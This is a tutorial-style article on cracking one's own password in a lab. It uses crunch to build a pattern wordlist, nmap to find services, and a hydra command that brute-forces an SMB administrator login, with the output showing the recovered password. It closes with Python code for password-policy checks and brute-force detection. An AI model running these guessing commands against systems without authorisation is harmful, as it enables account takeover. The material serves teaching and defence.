One of Us
So you’ve forgotten your password. Congratulations! There’s nothing wrong with that, and it happens far more often than you think. Of course, you could take care of everything in advance and set up one of the password managers so it does all of this for you, but you’re too busy for that, right?
I have used LastPass for many years now, but I regularly have to create temporary passwords for lab virtual machines, lab routers, or even applications that I do not plan to use later anyway.
Well, it looks like we don’t have a choice here – let’s guess, or simply crack, our own password.
We’ll need two tools: thc-hydra and crunch. We’ll also use the nmap scanner, but it is worthy of its own article.
Young psychic toolkit
What do we know about Hydras? Well, we know for sure that it inhabits swamps, has an attack of 16 and a defense of 18, and deals damage to all surrounding creatures.
No, not that Hydra.
thc-hydra is the most popular tool for dictionary-based password cracking. About 50 protocols are supported, including the most popular ones such as RDP, SSH, FTP, HTTP and SMB.
Crunch is a tool for creating dictionaries according to given parameters. Of course, we know that with sufficient complexity and length it is pointless to guess a password; a random 10-character password is immune to guessing. However, the brutal truth of life is that most users:
a) Choose simple passwords.
b) If there are complexity requirements, choose a base for the password and then pad it with special characters until it satisfies the required form.
For example, a user can take “mypassword” as the base and then make it “complex” when required – “%mypassword1A”, “Aamypassword<,!”, “Bmypassword* (”, and so on.
Let’s pretend that I know this base for my temporary passwords (of course I do!), so the first step is to create our own password dictionary.
To create a dictionary we’ll use the crunch utility. It has a fairly simple syntax, so the easiest way to understand it is through examples. Take a look:
crunch 2 6 qrs347
With this command we create a dictionary of words from 2 to 6 characters long, containing the symbols q, r, s, 3, 4 and 7 in all possible combinations. Now a slightly more complicated example:
crunch 8 8 ABCDEFGHIJKLMNOPQRSTUVWXYZ -t @@@@1980 -o wordlist.txt
With this command we create a dictionary of 8-character words following the pattern: 4 arbitrary characters from the specified set, followed by “1980”. The -o option saves the entire dictionary to the text file wordlist.txt.
We can experiment with the parameters: exclude duplicate characters, change the order of words in the dictionary, create more complex word patterns, and so on.
For our case the command will be:
crunch 14 14 -t @@mypassword@@ -f /usr/share/crunch/charset.lst lalpha-numeric-symbol14 -o mypassword.txt
Here we create a dictionary of 14-character words following the pattern: 2 characters, then the base “mypassword”, then 2 more characters. The placeholder characters are taken from the lalpha-numeric-symbol14 set in the file charset.lst. The resulting dictionary is stored in the file mypassword.txt.
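To see why this dictionary is small enough to be practical, here is an added Python example (not part of the original article and not crunch's own code) that counts the candidates a crunch -t pattern expands to, compares that with a truly random password of the same length, and turns the same observation into a password-policy check. The contents of the lalpha-numeric-symbol14 set are reproduced here as an assumption (26 lowercase letters, 10 digits and 14 symbols); what matters is its size, 50 characters, which gives 50^4 = 6,250,000 words, the figure hydra reports later in the article. The guessing rate used for the time estimate is hypothetical.

```python
import math
import string

# Assumed reproduction of crunch's lalpha-numeric-symbol14 set from charset.lst:
# 26 lowercase letters, 10 digits and 14 symbols, 50 characters in total.
LALPHA_NUMERIC_SYMBOL14 = string.ascii_lowercase + string.digits + "!@#$%^&*()-_+="

# Size of the full printable ASCII set, used as the "truly random password" baseline.
PRINTABLE_ASCII_SIZE = 95


def keyspace_size(pattern: str, charset_size: int, placeholder: str = "@") -> int:
    """Number of words a crunch -t pattern expands to: every placeholder position
    can hold any charset character, every other position is fixed."""
    return charset_size ** pattern.count(placeholder)


def entropy_bits(keyspace: int) -> float:
    """Guessing entropy of a password chosen uniformly from the given keyspace."""
    return math.log2(keyspace)


def seconds_at_rate(keyspace: int, guesses_per_second: float) -> float:
    """Worst-case time to exhaust the keyspace at a hypothetical guessing rate."""
    return keyspace / guesses_per_second


def matches_pattern(candidate: str, pattern: str, charset: str,
                    placeholder: str = "@") -> bool:
    """True if the candidate is one of the words the pattern would generate."""
    if len(candidate) != len(pattern):
        return False
    return all(c in charset if p == placeholder else c == p
               for c, p in zip(candidate, pattern))


def decorated_base_fraction(candidate: str, bases) -> float:
    """Largest share of the candidate made up of one known base word, compared
    case-insensitively. 0.0 when no base occurs in the candidate."""
    if not candidate:
        return 0.0
    lowered = candidate.lower()
    best = 0.0
    for base in bases:
        if base.lower() in lowered:
            best = max(best, len(base) / len(candidate))
    return best


def is_decorated_base(candidate: str, bases, threshold: float = 0.6) -> bool:
    """Policy check: reject passwords that are mostly a known base word with a
    few decoration characters around it (the habit described in the article)."""
    return decorated_base_fraction(candidate, bases) >= threshold


if __name__ == "__main__":
    pattern = "@@mypassword@@"
    small = keyspace_size(pattern, len(LALPHA_NUMERIC_SYMBOL14))
    full = keyspace_size("@" * len(pattern), PRINTABLE_ASCII_SIZE)
    print(f"{pattern}: {small:,} candidates, {entropy_bits(small):.1f} bits")
    print(f"random 14 chars: {full:,} candidates, {entropy_bits(full):.1f} bits")
    # 1,000 guesses per second is a hypothetical rate, not a measured one.
    hours = seconds_at_rate(small, 1000) / 3600
    print(f"exhausting the pattern at 1,000 guesses/s: {hours:.2f} h")
    for pw in ("%mypassword1A", "Aamypassword<,!", "Bmypassword* (", "correct-horse-battery"):
        print(f"{pw!r}: decorated base -> {is_decorated_base(pw, ['mypassword'])}")
```

The point of the comparison is that the 14-character password looks strong (about 92 bits if every character were random) but, once the base is known, only the four decoration characters carry any uncertainty, about 22.6 bits. The policy check uses the same insight from the other side: a list of known bases (old passwords, the company name, the user's name) and a threshold on how much of the new password they cover.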
Well, let’s hack ourselves now
thc-hydra has two major operation modes: using a dictionary or using brute force. Strictly speaking, in brute-force mode thc-hydra generates the dictionary on the fly, the same kind of dictionary we made a minute ago with crunch. I prefer dictionaries, as they allow a complex task to be broken into stages.
I’m sure our user name is Administrator, so we only have to guess the password.
Let’s start by figuring out which services are running on our server (192.168.70.128). We need to know which door to knock on. nmap gives us everything:
nmap -sV -T4 192.168.70.128
Stats: 0:00:45 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 46.15% done; ETC: 11:30 (0:00:42 remaining)
Nmap scan report for 192.168.70.128
Host is up (0.000080s latency).
Not shown: 987 closed ports
PORT      STATE SERVICE      VERSION
21/tcp    open  ftp          Microsoft ftpd
80/tcp    open  http         Microsoft IIS httpd 8.5
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
3389/tcp  open  ssl          Microsoft SChannel TLS
49152/tcp open  msrpc        Microsoft Windows RPC
49153/tcp open  msrpc        Microsoft Windows RPC
49154/tcp open  msrpc        Microsoft Windows RPC
49155/tcp open  msrpc        Microsoft Windows RPC
49156/tcp open  msrpc        Microsoft Windows RPC
49157/tcp open  msrpc        Microsoft Windows RPC
49158/tcp open  msrpc        Microsoft Windows RPC
We can choose anything from here – FTP, HTTP, SMB and even RDP. From thc-hydra’s point of view they are almost the same, and the syntax of the commands that follow will be similar. For example, using SMB:
hydra -l administrator -P mypassword.txt -t 1 192.168.70.128 smb
Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
Hydra (http://www.thc.org/thc-hydra) starting at 2018-03-15 11:58:04
[DATA] max 1 task per 1 server, overall 1 task, 6250000 login tries (l:1/p:6250000), ~6250000 tries per task
[DATA] attacking smb://192.168.70.128:445/
[smb] host: 192.168.70.128   login: administrator   password: aamypasswordaz
1 of 1 target successfully completed, 1 valid password found
Now we have it – aamypasswordaz is our password. Pretty easy, right?
It is obvious that some services are more susceptible to these attacks than others. For example, if you enable Network Level Authentication for RDP, the task becomes almost impossible. However, we used nmap for a reason – a potential attacker will look for the easiest way in. If the RDP and HTTP windows are narrow, they can simply be ignored in favour of the front door of SMB.
The exact syntax for different protocols will, of course, differ, and in general this type of attack has many nuances, but this example shows how easy it is to mount such an attack, and that it is within reach of people with very little training.
So use password managers and do not neglect best practices.
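On the defender’s side, a run like the one above leaves a very visible trace: a long stream of failed logons for a single account from a single source within a short time, ending in one success. Here is an added Python example (not from the original article and not part of hydra) of a minimal detection rule over such records. The log lines are constructed for the example, in a simplified key=value format rather than any real Windows or Samba event format, and the threshold and window are arbitrary choices; the source address 192.168.70.5 is likewise invented.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed sample records (not a real log format): one line per SMB
# authentication attempt against the lab server, as a single-threaded
# dictionary attack and one legitimate user's logon might look side by side.
SAMPLE_LOG = """\
2018-03-15T11:58:04 src=192.168.70.5 user=administrator service=smb result=FAIL
2018-03-15T11:58:05 src=192.168.70.5 user=administrator service=smb result=FAIL
2018-03-15T11:58:06 src=192.168.70.20 user=jdoe service=smb result=FAIL
2018-03-15T11:58:06 src=192.168.70.5 user=administrator service=smb result=FAIL
2018-03-15T11:58:07 src=192.168.70.5 user=administrator service=smb result=FAIL
2018-03-15T11:58:08 src=192.168.70.5 user=administrator service=smb result=FAIL
2018-03-15T11:58:09 src=192.168.70.5 user=administrator service=smb result=FAIL
2018-03-15T11:58:10 src=192.168.70.20 user=jdoe service=smb result=OK
2018-03-15T11:58:10 src=192.168.70.5 user=administrator service=smb result=FAIL
2018-03-15T11:58:11 src=192.168.70.5 user=administrator service=smb result=FAIL
2018-03-15T11:58:12 src=192.168.70.5 user=administrator service=smb result=FAIL
2018-03-15T11:58:13 src=192.168.70.5 user=administrator service=smb result=OK
"""

LINE_RE = re.compile(
    r"^(?P<ts>\S+) src=(?P<src>\S+) user=(?P<user>\S+) "
    r"service=(?P<service>\S+) result=(?P<result>\S+)$"
)


def parse_line(line: str) -> dict:
    """Parse one constructed log line into a record with a datetime timestamp."""
    m = LINE_RE.match(line.strip())
    if m is None:
        raise ValueError(f"unrecognised log line: {line!r}")
    rec = m.groupdict()
    rec["ts"] = datetime.fromisoformat(rec["ts"])
    return rec


def detect_bruteforce(records, threshold: int = 8,
                      window: timedelta = timedelta(seconds=60)) -> list:
    """Sliding-window rule keyed on (source, account): raise one alert when the
    number of failures inside the window reaches the threshold, and a second,
    higher-priority alert if that same pair later logs on successfully."""
    failures = defaultdict(deque)   # (src, user) -> timestamps of recent failures
    alerted = set()                  # pairs that already triggered a guessing alert
    alerts = []
    for rec in sorted(records, key=lambda r: r["ts"]):
        key = (rec["src"], rec["user"])
        if rec["result"] == "FAIL":
            q = failures[key]
            q.append(rec["ts"])
            while q and rec["ts"] - q[0] > window:   # drop failures outside the window
                q.popleft()
            if len(q) >= threshold and key not in alerted:
                alerted.add(key)
                alerts.append({"type": "password_guessing", "src": rec["src"],
                               "user": rec["user"], "service": rec["service"],
                               "failures": len(q), "at": rec["ts"]})
        elif rec["result"] == "OK" and key in alerted:
            alerts.append({"type": "success_after_guessing", "src": rec["src"],
                           "user": rec["user"], "service": rec["service"],
                           "at": rec["ts"]})
    return alerts


def analyse(text: str, **kwargs) -> list:
    """Parse a block of log text and run the detection rule over it."""
    return detect_bruteforce([parse_line(l) for l in text.splitlines() if l.strip()],
                             **kwargs)


if __name__ == "__main__":
    for alert in analyse(SAMPLE_LOG):
        print(alert)
```

The rule is deliberately simple: it keys on the source and target account, so a single legitimate user mistyping a password does not trip it, while hydra running with -t 1 against one account produces eight failures in eight seconds and is flagged almost immediately. A success right after an alerted burst is reported separately, since that is the event that needs a response rather than just a ticket. In practice an account lockout policy or a rate limit on the service would stop the run long before 6,250,000 tries, and the same rule applies unchanged to FTP, HTTP or RDP records once they are parsed into the same fields.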